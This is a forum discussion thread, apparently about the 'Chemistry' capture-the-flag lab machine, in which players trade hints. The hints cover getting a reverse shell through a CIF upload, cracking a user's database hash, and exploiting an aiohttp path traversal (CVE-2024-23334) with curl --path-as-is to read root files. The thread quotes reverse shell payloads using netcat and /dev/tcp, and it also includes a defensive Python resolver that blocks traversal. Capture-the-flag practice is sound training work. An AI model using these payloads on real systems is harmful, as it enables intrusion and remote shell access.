Official Chemistry Discussion

I cracked the hash for the app user “rosa” from the DB but using the same password for ssh as user “rosa” does not work.

How do I switch from “app” to the “rosa” Linux user? What am I missing?

You can use your reverse shell to switch to the user manually:

su rosa. Although this is not as interactive as ssh, it should work if your ssh doesn’t.

Why is it taking forever to upload my CIF file?

Did you mean using “su” within the reverse shell, or a different way?
I’ve tried “su rosa” with no luck.


Chemistry pwned

I’ve got stuck on the root flag. I got into the machine, got a reverse shell and got the user’s ssh password.

I’ve tried linpeas and found CVE-2021-3560, but it didn’t work. Then I remembered about ports and that 8080 was open. I’ve forwarded this port via ssh -L. There’s Server: Python/3.9 aiohttp/3.9.1, and aiohttp 3.9.1 has CVE-2024-23334, but it too doesn’t work. I’ve tried different scripts and even a handmade version with curl -s -path-as-is. But no result.

Can anyone help me, please?

Update: I’ve done it, but why does this allow reading root files?
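On the “why does this allow reading root files” question: curl’s --path-as-is sends the ../ segments exactly as typed instead of collapsing them client-side, so it is the server’s static handler that decides what a traversal means. The check that has to happen is that the requested path, after decoding and after following symlinks, still lands inside the directory being served. The following is an added example written for this thread, not code from aiohttp or from any poster; resolve_static, demo and the temp-directory layout are my own names, and it needs Python 3.9 or later.

```python
# Added example for this thread, not code from aiohttp or from any poster.
# A hardened static-file resolver: maps a URL path onto a file under a root
# directory and rejects anything that resolves outside it, whether via a
# literal "..", a percent-encoded "%2e%2e", or a symlink inside the root that
# points out of it. Function names and the temp-directory layout are my own.
from pathlib import Path
from typing import Dict, Optional
from urllib.parse import unquote
import tempfile


def resolve_static(root: Path, url_path: str) -> Optional[Path]:
    """Return the file under `root` that `url_path` names, or None if it escapes.

    The order matters: decode once, join under root, resolve (which follows
    symlinks and collapses ".."), and only then compare against the resolved
    root. Checking the raw string for ".." before resolving is exactly what
    encoded and symlink-based traversals get around.
    """
    if "\0" in url_path:
        return None
    root = root.resolve()
    relative = unquote(url_path).lstrip("/")
    candidate = (root / relative).resolve()
    # Containment: candidate must be root itself or somewhere beneath it.
    if candidate != root and root not in candidate.parents:
        return None
    if not candidate.is_file():
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Build a constructed tree in a temp dir and exercise the resolver.

    <tmp>/static/a.txt                 -> meant to be served
    <tmp>/secret.txt                   -> outside the served root
    <tmp>/static/link -> ../secret.txt -> symlink escaping the root
    """
    base = Path(tempfile.mkdtemp())
    root = base / "static"
    root.mkdir()
    (root / "a.txt").write_text("public\n")
    (base / "secret.txt").write_text("not for the web\n")
    (root / "link").symlink_to(base / "secret.txt")
    return {
        "plain_file_served": resolve_static(root, "/a.txt") is not None,
        "dotdot_rejected": resolve_static(root, "/../secret.txt") is None,
        "encoded_dotdot_rejected": resolve_static(root, "/%2e%2e/secret.txt") is None,
        "symlink_escape_rejected": resolve_static(root, "/link") is None,
        # Decoding happens once, so a double-encoded ".." stays a literal
        # directory name that does not exist under root.
        "double_encoded_rejected": resolve_static(root, "/%252e%252e/secret.txt") is None,
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The symlink case is the one worth noticing: a handler that only normalises the string would happily serve <root>/link, because the string never left the root; the escape only shows up once the link is followed, which is why the containment check has to run on the resolved path.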

Hi, you need to try “ss -tulpn”; another bug is waiting for you.

I am also stuck on the root flag. What did you do differently after the curl -s -path-as-is? I feel like I am missing something tiny here and I cannot tell what it is. Driving me nuts.

Update: never mind, I am an idiot. I just tried again with curl -s --path-as-is and it worked. I must have mistyped. Lesson learned: make sure I try every single discussion poster’s attempt first before I give up and post.

Can anyone point me in the right direction for formatting the payload? I’ve tried so many different variations using .system(“busybox nc 10.10.11.38 5000 -e /bin/bash 0>&1\'”) and “/bin/bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1'”

Everything I try results in a 500 Internal Server Error. I’ve got it parsing locally with a short Python script, but nothing on the web app.

I don’t know what is or isn’t a spoiler, so I’m going to tiptoe around this as best I can, but if you want more info let me know :smiley:

Check out revshells.com; they have a few good payloads. I used one of them for my shell!


I am struggling on the last steps. I am exploiting the aiohttp exploit with the specific Python script which allows me to brute force requests. However, it always comes up with 404 errors. Does anyone have any ideas?

Hey, I’m stuck finding the root flag. Actually I have ssh to rosa and a reverse shell to app. I tried forwarding port 8080 and also the PoCs on aiohttp, but every time I try to access /root/ I get forbidden access.

Can someone please help me :slight_smile:

Can somebody help me? I kinda hit a roadblock :frowning:

I got the reverse shell through the CIF file, and then I got access to the rosa account.

I have no clue how to escalate my privs to root/get the root flag :frowning:

Try looking at services on localhost.


Somebody please help me. I got user creds, connected to the target via ssh and got the user flag. I found out about the localhost port 8080, port forwarded it and curled it for the version, got the vulnerable aiohttp version and found the exploit and the PoC. Okay, so how do I exploit it?

Am I on the right path or in a rabbit hole?

How did you get creds?

Same error.

Turns out the 500 server error is expected. Make sure you have a port configured in your payload and then start a netcat listener on that port (nc -lvn 4444 for example). The page will error out to 500, but you should see your shell reflected in the terminal.

If you’re not getting anything reflected in your terminal, try swapping to a different VPN or restarting the box. I was having the same issue with a correct payload, and doing one (or both) of these things without changing my payload got me the reverse shell.

In the netcat command it’s formatted like so:
nc <your_ip> <your_port>

So it would look summat like this:

nc 10.10.11.79 4444
Just of course replace the port number with whichever port you wanna listen on!

For rosa, explore the sqlite database :smiley: